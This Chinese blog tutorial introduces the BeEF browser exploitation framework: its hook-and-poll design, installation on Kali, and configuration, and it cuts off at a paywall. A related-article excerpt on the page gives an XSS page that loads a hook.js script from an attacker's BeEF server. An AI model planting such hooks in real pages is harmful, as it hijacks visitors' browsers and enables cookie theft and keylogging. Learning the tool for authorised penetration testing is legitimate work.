XSS自动化工具——Beef

最新推荐文章于 2024-05-09 16:26:31 发布
最新推荐文章于 2024-05-09 16:26:31 发布
阅读量5.4k 收藏 38
点赞数 4
分类专栏: 工具使用
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/zzwwhhpp/article/details/114641507
版权

Beef的使用


在我的记忆之中之前是有些过关于beef这款工具的使用的文章的,然而最近整理博客,一看,发现怎么没有了,可能是我忘了吧,或者可能也可能是在梦里写了。。。今天来写一下吧

一、Beef简介

Browser Exploitation Framework (BeEF)

BeEF 是目前最强大的浏览器开源渗透测试框架,通过xss漏洞配合JS脚本和Metasploit进行渗透,

BeEF 是基于Ruby语言编写的,并且支持图形化操作,操作简单。

beef官方网站:http://beefproject.com/

在这里插入图片描述
工程框架:
在这里插入图片描述
在这里插入图片描述zombie(僵尸)即受害的浏览器。zombie是被hook(勾连)的,如果浏览器访问了有勾子(由js编 写)的页面,就会被hook,勾连的浏览器会执行初始代码返回一些信息,接着zombie会每隔一段时间 (默认为1秒)就会向BeEF服务器发送一个请求,询问是否有新的代码需要执行。BeEF服务器本质上就 像一个Web应用,被分为前端UI,和后端。前端会轮询后端是否有新的数据需要更新,同时前端也可以向后端发送指示, BeEF持有者可以通过浏览器来登录BeEF 的后台管理UI。

二、beef的下载安装

kali自带beef

如果没有的话通过以下方式进行下载安装

apt-get update
apt-get install beef-xss

安装完之后开始 beef
cd /usr/share/beef-xss/ # 切换到beef所在目录
./beef # 启动 beef

启动 beef 出现

[!] ERROR: Don’t use default username and password!
|_ Change the beef.credentials.passwd in /etc/beef-xss/config.yaml

然后根据提示去修改配置。
vim /etc/beef-xss/config.yaml

在这里插入图片描述可以进行更改账号密码

修改完之后,Beef安装即为成功

接下来启动beef

在命令行输入命令:beef-xss
即可启动beef,自动弹出beef浏览器窗口,输入账号密码即可进入

在这里插入图片描述

三、Beef配置

kali下的BeeF配置文件在 /usr/share/beef-xss/config.yaml,其它的配置文件也在这个目录的子目录下,往后在使用某些功能时,需要修改对应的配置文件。自主安装的BeeF配置文件会在BeeF的主目录 下config.yaml,建议修改几个地方:

permitted_hooking_subnet: “0.0.0.0/0” #指定某个网段,只有在这个网段的浏览器才

最低0.47元/天 解锁文章
世间繁华梦一出
关注
  • 4
    点赞
  • 38
    收藏
    觉得还不错? 一键收藏
  • 4
    评论
专栏目录
BEEF的搭建与使用
王意林的专栏
07-17 1万+
安装与搭建 beef是ruby写的,在windows下安装beef还是有些麻烦的,需要装很多东西。 源码在github googlecode等地方均有下载 http://code.google.com/p/beef/downloads/list https://github.com/beefproject/beef 在windows下配置ruby,推荐大家使用railsinstal
kali下安装beef-xss
qq_63261741的博客
04-14 479
【代码】kali下安装beef-xss
CentOS 6.5下安装BeEF
无节操
02-18 4022
CentOS 6.5下安装BeEF1. 安装rvmgpg --keyserver hkp://keys.gnupg.net --recv-keys 409B6B1796C275462A1703113804BB82D39DC0E3curl -sSL https://get.rvm.io | bash -s stable --ruby注意提示 source /usr/local/rvm/scripts
网络安全最全Beefxss使用教程图文教程(超详细)_怎么把beef改成公网ip(3),2024春招面试
最新发布
2401_84302816的博客
05-09 675
beef-XSS界面有很多栏,重点是 Commands 栏的功能指令,其他的基本用不到,不用太留意。Online Browsers:在线浏览器,工具定时发送链接请求,链接成功就会显示在这里。Offline Browsers:离线浏览器Getting Started:入门指南,官方的一些文档Logs:日志,记录工具做过哪些操作Zombies:僵尸,记录可以利用的目标站点Current Browser:上线的浏览器,只有在目标在线的时候才会显示出来。
kali下载beef-xss及利用
qq_53175607的博客
12-15 1702
1.beef-xss下载 使用apt-get update 更新kali(不是管理员用户前面加sudo) apt-get install beef-xss 下载beef(不是管理员用户前面加sudo) 2.利用 启动输入命令beef-xss http://kaliip:3000/ui/panel打开登录页面 构建一个简单的xss html页面 <html> <head> <script src='http://kaliip:3000/hook.js'></
xss-工具-Beef-Xss安装以及使用
weixin_44257023的博客
07-24 5958
xss-工具-Beef-Xss安装以及使用
beef-xxx安装遇到的问题(几个软件包无法下载)
qq_74240553的博客
07-21 202
beef-xss工具的安装使用
beef-xss详细教程(一文带你学会beef) | Kali下安装beef | beef-xss反射型,储存型利用 | beef实现Cookie会话劫持 | 键盘监听 | 浏览器弹窗,重定向等
热门推荐
Martin-share的博客
02-12 1万+
beef-xss详细教程(一文带你学会beef) | Kali下安装beef | beef-xss反射型,储存型利用 | beef实现Cookie会话劫持 | 键盘监听 | 浏览器弹窗,重定向等
第一节 自动化xss挖掘介绍-01
09-15
自动化XSS挖掘工具xsser详解 自动化XSS挖掘工具xsser是用于自动化Web应用程序漏洞挖掘、利用和报告的框架,以下是对xsser工具的详细介绍。 xsser工具介绍 xsser是一款功能强大且灵活的自动化XSS挖掘工具,旨在...
XSS测试代码大全————
11-03
XSS测试代码 安全测试 XSS测试代码大全
Metasploit+beef攻击实验
10-12
BeEF,全称The Browser Exploitation Framework,是一款针对浏览器的渗透测试工具
自动化检测XSS漏洞插件
10-15
自动化检测XSS漏洞插件,希望对大家使用有帮助,一起进步,一起分享
免费蓝莲花Bluelotus,XSS工具网安
08-14
【免费】蓝莲花Bluelotus,XSS工具【网安】【免费】蓝莲花Bluelotus,XSS工具【网安】【免费】蓝莲花Bluelotus,XSS工具【网安】【免费】蓝莲花Bluelotus,XSS工具【网安】【免费】蓝莲花Bluelotus,XSS工具【网安】...
webwell安全工具-BeEF
凯歌响起的博客
09-05 1897
BeEF,全称The Browser Exploitation Framework,是一款针对浏览器的渗透测试工具。用Ruby语言开发的,Kali中默认安装的一个模块,用于实现对XSS漏洞的攻击和利用。​ BeEF主要是往网页中插入一段名为hook.js的JS脚本代码,如果浏览器访问了有hook.js(钩子)的页面,就会被hook(勾住),勾连的浏览器会执行初始代码返回一些信息,接着目标主机会每隔一段时间(默认为1秒)就会向BeEF服务器发送一个请求,询问是否有新的代码需要执行。
kali,beef-xss安装及使用
m0_73581247的博客
06-22 1709
1.Beef工具 1.1 Beef工具介绍   Beef是日前最强大的浏览器开源渗透测试框架,通过X55漏洞配合JS脚本和 Metasploit进行渗透; Beef是基于Ruby语言编写的,并且支持图形化界面,操作简单。   新版的kail已经不自带beef工具了,需要自己下载。并且目前只支持macos和Linux系统。1.2 Beef工具安装   在安装beef工具之前建议更新一下源   apt-get update   apt-get install beef-xss 时间比较久,可以去放松一会   启
利用 BeEF 执行 XSS 攻击的总结
weixin_71139244的博客
05-27 1056
跨站脚本攻击,简称XSS,是一种网站应用程序的安全漏洞攻击,属于代码注入的一种;与其他攻击相比,XSS攻击所带来的危害更大。跨站脚本攻击XSS,是最普遍的Web应用安全漏洞。这类漏洞能够使得攻击者嵌入恶意脚本代码到正常用户会访问到的页面中,当正常用户访问该页面时,则可导致嵌入的恶意脚本代码的执行,从而达到恶意攻击用户的目的。
Web安全 XSS漏洞的利用(Beef工具)(点击链接就被黑的技术.)
网络安全领域___专研者.
03-18 4063
XSS漏洞的 概括: XSS又叫CSS(Cross Site Script)跨站脚本攻击,指的是攻击者在Web页面,插入恶意JS代码,当用户浏览该页之时,嵌入其中JS代码就会被执行,从而达到攻击的目的.(包含:收集用户的Cookie,添加账号,修改密码,提高用户权限等等.)
为什么XSS漏洞使用自动化工具不容易扫描出来
07-12
XSS(跨站脚本攻击)漏洞的自动化扫描工具在发现漏洞方面可能会遇到一些挑战。以下是一些原因: 1. 动态内容:现代Web应用程序通常使用动态内容生成页面,这使得XSS漏洞扫描变得困难。自动化工具难以分析动态生成的内容,因为它们无法准确模拟用户交互和应用程序的上下文。这导致自动化工具可能无法探测到通过动态生成的内容注入恶意脚本的漏洞。 2. 客户端执行:XSS漏洞的利用通常涉及客户端执行,即恶意脚本在用户的浏览器上执行。自动化工具难以模拟用户端环境,因此无法完全重现攻击场景。这使得自动化扫描工具更难以检测到XSS漏洞。 3. 跨站点脚本保护:现代Web应用程序通常具有一些内置的安全机制来防止XSS攻击,例如输入验证和输出编码。这些机制可能使自动化工具难以成功利用XSS漏洞。 4. DOM操作:XSS攻击可以通过修改DOM(文档对象模型)来实现。自动化工具难以模拟和分析复杂的DOM操作,因此可能无法检测到基于DOM的XSS漏洞。 尽管自动化扫描工具在检测XSS漏洞方面存在一些限制,但它们仍然是有价值的工具,可以帮助发现一些常见和简单的漏洞。然而,对于更复杂的漏洞和定制化的攻击场景,手动安全测试和代码审查仍然是必不可少的。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 4
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值